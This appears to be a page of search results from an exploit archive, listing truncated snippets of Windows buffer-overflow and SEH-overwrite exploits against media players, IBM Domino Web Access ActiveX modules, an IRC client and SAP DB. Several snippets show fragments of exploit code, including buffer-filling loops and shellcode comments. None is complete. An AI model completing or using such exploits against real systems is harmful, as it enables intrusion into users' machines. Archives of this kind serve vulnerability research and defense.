12 matches found
Virtuosa Phoenix Edition 5.2 ASX SEH BOF
Exploit for windows platform in category local exploits !/usr/bin/python Exploit Title: Virtuosa Phoenix Edition 5.2 ASX BOF SEH Overwrite Date found: Aug 16th 2010 Author: Acidgen Software Link: http://download1.virtuosa.com/VirtuosaTrial.exe Version: 5.2 Tested on: Windows XP SP2 Virtuosa - Fil...
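RainbowPlayer .rpl File Parsing Stack Overflow Vulnerability
BUGTRAQ ID: 34072 RainbowPlayer is a free media player for Windows. If a user is tricked into opening a playlist file (.rpl) containing an overlong entry with RainbowPlayer, a stack overflow may be triggered, leading to execution of arbitrary instructions. NanoCode Software RainbowPlayer 0.91 Vendor patch: NanoCode Software ----------------- The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version: http://www.nanocodesoft.com/rainbowplayer.htm usage:...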
StreamAudio ChainCast ProxyManager - 'ccpm_0237.dll' Remote Buffer Overflow
StreamAudio ChainCast ProxyManager ccpm0237.dll SEH Overwrite Exploit function Check var buf = 'A'; while buf.length = 242 buf = buf + 'A'; // win32exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com var shellcode1 =...
StreamAudio ChainCast ProxyManager - ccpm_0237.dll Remote Buffer Overflow
StreamAudio ChainCast ProxyManager - ccpm0237.dll Remote Buffer Overflow StreamAudio ChainCast ProxyManager ccpm0237.dll SEH Overwrite Exploit function Check var buf = 'A'; while buf.length = 242 buf = buf + 'A'; // win32exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2...
Move Networks Quantum Streaming Player SEH Overwrite Exploit
Exploit for unknown platform in category remote exploits ============================================================ Move Networks Quantum Streaming Player SEH Overwrite Exploit ============================================================ Move Networks Quantum Streaming Player SEH Overwrite...
IBM Domino Web Access Upload Module inotes6.dll BoF Exploit
No description provided by source. !-- written by e.b. IBM Domino Web Access Upload Module inotes6.dll SEH Overwrite Exploit Bad chars: 0x80+ CVE-2007-4474 Tested on Windows XP SP2 fully patched English, IE6, inotes6.dll version 6.0.40.0 and version 6.0.48.0...
inotes6w2-overwrite.txt
This one is the same offset as dwa7w and the same class id as inotes6. Basically inotes6 and inotes6w share the same class id, except that inotes6w is unicode. dwa7w is unicode and has a different class id. Code is inline, I would attach it except for the fact that I set off way too many av scanne...
dwa7w-overwrite.txt
This one is unicode based, so is inotes6w. Exploitation for inotes6w is probably the same just with a different offset. Code is inline and attached. --------------------- IBM Domino Web Access Upload Module dwa7w.dll SEH Overwrite Exploit function Check var buf = unescape"%u4141"; while buf.lengt...
IBM Domino Web Access Upload Module - dwa7w.dll Remote Buffer Overflow
IBM Domino Web Access Upload Module - dwa7w.dll Remote Buffer Overflow IBM Domino Web Access Upload Module dwa7w.dll SEH Overwrite Exploit function Check var buf = unescape"%u4141"; while buf.length = 2461 buf = buf + unescape"%u4141"; // win32exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe...
IBM Domino Web Access 7.0 Upload Module - inotes6.dll Remote Buffer Overflow
IBM Domino Web Access 7.0 Upload Module - inotes6.dll Remote Buffer Overflow IBM Domino Web Access Upload Module inotes6.dll SEH Overwrite Exploit function Check var buf = 'A'; while buf.length = 3119 buf = buf + 'A'; // win32exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378...
ViRC 2.0 (JOIN Response) Remote SEH Overwrite Exploit 0day
No description provided by source. !/usr/bin/python ViRC 2.0 'JOIN Response' 0day Remote SEH Overwrite PoC Exploit Bug discovered by Krystian Kloskowski h07 Tested on Visual IRC 2.0 / 2k SP4 Polish Shellcode type: Windows Execute Command calc.exe How stuff works ? .. ViRC -----...
SAP DB 7.x Web Server - WAHTTP.exe Multiple Buffer Overflow Vulnerabilities
SAP DB 7.x Web Server - WAHTTP.exe Multiple Buffer Overflow Vulnerabilities // source: https://www.securityfocus.com/bid/24773/info SAP DB Web Server is prone to multiple buffer-overflow vulnerabilities because it fails to adequately bounds-check user-supplied input before copying it to an...